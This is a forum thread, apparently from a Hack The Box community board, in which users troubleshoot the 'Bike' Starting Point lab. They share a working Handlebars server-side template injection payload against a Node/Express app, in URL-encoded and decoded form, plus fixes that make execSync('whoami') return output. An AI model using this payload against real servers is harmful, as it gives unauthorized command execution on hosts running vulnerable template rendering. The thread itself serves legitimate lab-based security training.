Starting Point: Bike

mercadier · May 18, 2022, 3:26pm

This box isn’t working the way it should according to the walkthrough. In burp repeater I execute:

POST / HTTP/1.1

Host: 10.129.12.226

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 1334

Origin: http://10.129.12.226

Connection: close

Referer: http://10.129.12.226/

Upgrade-Insecure-Requests: 1



email=%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%0a%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%77%68%6f%61%6d%69%27%29%3b%22%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%7b%7b%74%68%69%73%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d&action=Submit

I get back this:

HTTP/1.1 200 OK

X-Powered-By: Express

Content-Type: text/html; charset=utf-8

Content-Length: 1172

ETag: W/"494-RpawBI+3kN5Kwt8S54wY32132DQ"

Date: Wed, 18 May 2022 15:21:07 GMT

Connection: close



<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="css/home.css">
    <title> Bike </title>
</head>
<header>

</header>

<body>
    <div id=container>
  <img
    src="images/buttons.gif"
    id="avatar">
  <div class="type-wrap">
    <span id="typed" style="white-space:pre;" class="typed"></span>
  </div>
</div>
<div id="contact">
    <h3>We can let you know once we are up and running.</h3>
    <div class="fields">
      <form id="form" method="POST" action="/">
        <input name="email" placeholder="E-mail"></input>
        <button type="submit" class="button-54" name="action" value="Submit">Submit</button>
      </form>
    </div>
    <p class="result">
        We will contact you at:  e
 2
 [object Object]
 function Function() { [native code] }
 2
 [object Object]

    </p>
</div>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="js/typed.min.js"></script>
    <script src="js/main.js"></script>
</body>

</html>

According to the walkthrough I should get this:

mercadier · May 20, 2022, 12:01pm

I found out that it’s possible to follow this walkthrough all the way through if you use the pwnbox, but not if you’re using Kali-Linux-2022.2-virtualbox-amd64. Does anyone know why this is? What’s the vital difference?

xMaSteRxQuiLtx · June 2, 2022, 2:53am

@mercadier I am running into the exact same issue. I’m using Ubuntu 22.04 LTS. Have you found a solution or you still waiting for a solution?

JunkieBarstool · June 9, 2022, 2:18pm

I was having the same problem. I got around it by encoding the code block:

{{#with “s” as |string|}}
{{#with “e”}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub “constructor”)}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push “return process.mainModule;”}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}

Then instead of copying the next code blocks, just append the additional code onto the end of mainModule. You should be able to get the flag this way.

SampleService · July 26, 2022, 5:23pm

I think machine does not work. I’ve got “The connection was reset” in pwnbox when entering magic {{7*7}}.

vexovoid · July 27, 2022, 10:17am

Hello there, I am having the exact same issue described by @SampleService

I am using a fresh install of Kali 2022.2 as guest on Vbox, but I’ve got the same issue even with a Debian as host.

TGee · July 28, 2022, 11:06am

I’m having something similar. When I’m entering {{7*7}}, the error page is not loading. So I don’t see the server-side error code. I only get the firefox error page that the site could not be loaded. “Firefox can’t establish a connection to the server at 10.129.196.1.”

I’m connected via OpenVPN.
Kali Linux 2022.2

Gor1kGor1k · July 29, 2022, 12:16pm

Exact same issue here, please file a case to customer service like i did. I believe in case they 'll receive massive load of such queries this might speed up the process for this machine.

guri · July 29, 2022, 6:09pm

I’m running into exact same issue.
I send {{7*7}}, received “The connection was reset”.

vexovoid · August 6, 2022, 1:12pm

The machine is now working properly, just solved without any problems!

BlackBart · September 5, 2022, 10:04pm

This worked for me… thanks

eltoro0815 · November 20, 2022, 8:18pm

If you are not getting the output “root” add the method toString()

{{#with "s" as |string|}}
 {{#with "e"}}
 {{#with split as |conslist|}}
 {{this.pop}}
 {{this.push (lookup string.sub "constructor")}}
 {{this.pop}}
 {{#with string.split as |codelist|}}
 {{this.pop}}
 {{this.push "return process.mainModule.require('child_process').execSync('whoami').toString();"}}
 {{this.pop}}
 {{#each conslist}}
 {{#with (string.sub.apply 0 codelist)}}
 {{this}}
 {{/with}}
 {{/each}}
 {{/with}}
 {{/with}}
 {{/with}}
{{/with}}

lazytt · November 30, 2022, 10:00am

I tried to apply the encoded payload directly to the email box. Didn’t get the same result as with using Burp. Got that “We will contact you at: %7b%7b%23%77%69%74%68%20%22%73%22%20%6…”.
Has anyone tried that and/or can explain the difference between how the string that is applied directly is different from the one sent through Burp Repeater?

rburger · December 20, 2022, 9:01pm

Once I change the return process line to "{{this.push “return process.mainModule.require(‘child_process’).execSync(‘whoami’);”}}, it gives me output but does not indicate “root” in the return.

Then all other node.js codes that follow only provide me syntax errors. I’ve tried copying, typing, running this on the HTB desktop, running the lab on a VPN through ParrotSec, and I get stuck at this point every time.

outsider343 · January 27, 2023, 3:11pm

It worked for me, thank you so much!

technonerd · February 16, 2023, 1:21am

There is text formatting error if you follow along in the writeup and copy and paste into burp. There is an extra line. Anything that is below the this.push "return line should be moved and add to it.

{{this.push “return
process.mainModule.require(‘child_process’).execSync(‘whoami’);”}}

Should look like

{{this.push “return process.mainModule.require(‘child_process’).execSync(‘whoami’);”}}